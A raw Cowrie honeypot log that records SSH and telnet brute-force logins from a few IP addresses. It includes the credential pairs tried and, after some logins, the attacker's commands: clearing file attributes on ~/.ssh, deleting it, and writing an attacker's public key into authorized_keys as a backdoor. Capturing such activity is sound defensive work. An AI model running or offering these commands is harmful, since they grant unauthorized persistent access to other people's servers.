{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T22:49:57.268941Z","src_ip":"77.90.185.47","session":"65ef0a141f90"}
{"eventid":"cowrie.login.failed","username":"pfsense","password":"pfsense","message":"login attempt [pfsense/pfsense] failed","sensor":"my-vps","timestamp":"2025-08-28T22:49:57.782750Z","src_ip":"77.90.185.47","session":"65ef0a141f90"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:49:58.860212Z","src_ip":"77.90.185.47","session":"65ef0a141f90"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55704,"dst_ip":"1.2.3.4","dst_port":22,"session":"5832702b7e96","protocol":"ssh","message":"New connection: 212.227.235.229:55704 (1.2.3.4:22) [session: 5832702b7e96]","sensor":"my-vps","timestamp":"2025-08-28T22:50:04.087073Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T22:50:04.089230Z","src_ip":"212.227.235.229","session":"5832702b7e96"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T22:50:04.359488Z","src_ip":"212.227.235.229","session":"5832702b7e96"}
{"eventid":"cowrie.login.success","username":"root","password":"Qq123123","message":"login attempt [root/Qq123123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:50:05.449119Z","src_ip":"212.227.235.229","session":"5832702b7e96"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:50:06.014448Z","src_ip":"212.227.235.229","session":"5832702b7e96"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T22:50:06.015360Z","src_ip":"212.227.235.229","session":"5832702b7e96"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T22:50:06.016427Z","src_ip":"212.227.235.229","session":"5832702b7e96"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:50:06.289443Z","src_ip":"212.227.235.229","session":"5832702b7e96"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:50:06.890498Z","src_ip":"212.227.235.229","session":"5832702b7e96"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T22:50:06.891311Z","src_ip":"212.227.235.229","session":"5832702b7e96"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T22:50:07.166539Z","src_ip":"212.227.235.229","session":"5832702b7e96"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:50:07.167536Z","src_ip":"212.227.235.229","session":"5832702b7e96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56422,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc413a041c3e","protocol":"ssh","message":"New connection: 212.227.235.229:56422 (1.2.3.4:22) [session: dc413a041c3e]","sensor":"my-vps","timestamp":"2025-08-28T22:50:07.438996Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T22:50:07.440605Z","src_ip":"212.227.235.229","session":"dc413a041c3e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T22:50:07.712332Z","src_ip":"212.227.235.229","session":"dc413a041c3e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T22:50:08.805158Z","src_ip":"212.227.235.229","session":"dc413a041c3e"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:50:10.084169Z","src_ip":"212.227.235.229","session":"dc413a041c3e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56914,"dst_ip":"1.2.3.4","dst_port":22,"session":"6774c9200d00","protocol":"ssh","message":"New connection: 212.227.235.229:56914 (1.2.3.4:22) [session: 6774c9200d00]","sensor":"my-vps","timestamp":"2025-08-28T22:50:10.358337Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T22:50:10.359605Z","src_ip":"212.227.235.229","session":"6774c9200d00"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T22:50:10.635068Z","src_ip":"212.227.235.229","session":"6774c9200d00"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:50:11.785616Z","src_ip":"212.227.235.229","session":"6774c9200d00"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:50:12.062623Z","src_ip":"212.227.235.229","session":"5832702b7e96"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:50:12.063756Z","src_ip":"212.227.235.229","session":"6774c9200d00"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40506,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3b33470657f","protocol":"ssh","message":"New connection: 212.227.235.229:40506 (1.2.3.4:22) [session: e3b33470657f]","sensor":"my-vps","timestamp":"2025-08-28T22:51:54.938516Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T22:51:54.939508Z","src_ip":"212.227.235.229","session":"e3b33470657f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T22:51:55.043887Z","src_ip":"212.227.235.229","session":"e3b33470657f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47256,"dst_ip":"1.2.3.4","dst_port":23,"session":"b766306a30c2","protocol":"telnet","message":"New connection: 212.227.235.229:47256 (1.2.3.4:23) [session: b766306a30c2]","sensor":"my-vps","timestamp":"2025-08-28T22:51:55.131105Z"}
{"eventid":"cowrie.login.success","username":"root","password":"azerty","message":"login attempt [root/azerty] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:51:55.506217Z","src_ip":"212.227.235.229","session":"e3b33470657f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:51:56.190550Z","src_ip":"212.227.235.229","session":"e3b33470657f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T22:51:56.191285Z","src_ip":"212.227.235.229","session":"e3b33470657f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T22:51:56.192865Z","src_ip":"212.227.235.229","session":"e3b33470657f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:51:56.293774Z","src_ip":"212.227.235.229","session":"e3b33470657f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:51:56.521750Z","src_ip":"212.227.235.229","session":"e3b33470657f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T22:51:56.522434Z","src_ip":"212.227.235.229","session":"e3b33470657f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T22:51:56.630907Z","src_ip":"212.227.235.229","session":"e3b33470657f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:51:56.631793Z","src_ip":"212.227.235.229","session":"e3b33470657f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47290,"dst_ip":"1.2.3.4","dst_port":22,"session":"585710333360","protocol":"ssh","message":"New connection: 212.227.235.229:47290 (1.2.3.4:22) [session: 585710333360]","sensor":"my-vps","timestamp":"2025-08-28T22:51:56.735282Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T22:51:56.736251Z","src_ip":"212.227.235.229","session":"585710333360"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T22:51:56.841686Z","src_ip":"212.227.235.229","session":"585710333360"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T22:51:57.301244Z","src_ip":"212.227.235.229","session":"585710333360"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:51:58.410318Z","src_ip":"212.227.235.229","session":"585710333360"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47292,"dst_ip":"1.2.3.4","dst_port":22,"session":"0867a693798c","protocol":"ssh","message":"New connection: 212.227.235.229:47292 (1.2.3.4:22) [session: 0867a693798c]","sensor":"my-vps","timestamp":"2025-08-28T22:51:58.516224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T22:51:58.517261Z","src_ip":"212.227.235.229","session":"0867a693798c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T22:51:59.040202Z","src_ip":"212.227.235.229","session":"0867a693798c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:51:59.501911Z","src_ip":"212.227.235.229","session":"0867a693798c"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:51:59.609245Z","src_ip":"212.227.235.229","session":"e3b33470657f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:51:59.610292Z","src_ip":"212.227.235.229","session":"0867a693798c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":8448,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ce545a0c033","protocol":"ssh","message":"New connection: 212.227.125.160:8448 (1.2.3.4:22) [session: 4ce545a0c033]","sensor":"my-vps","timestamp":"2025-08-28T22:52:05.848384Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T22:52:05.976447Z","src_ip":"212.227.125.160","session":"4ce545a0c033"}
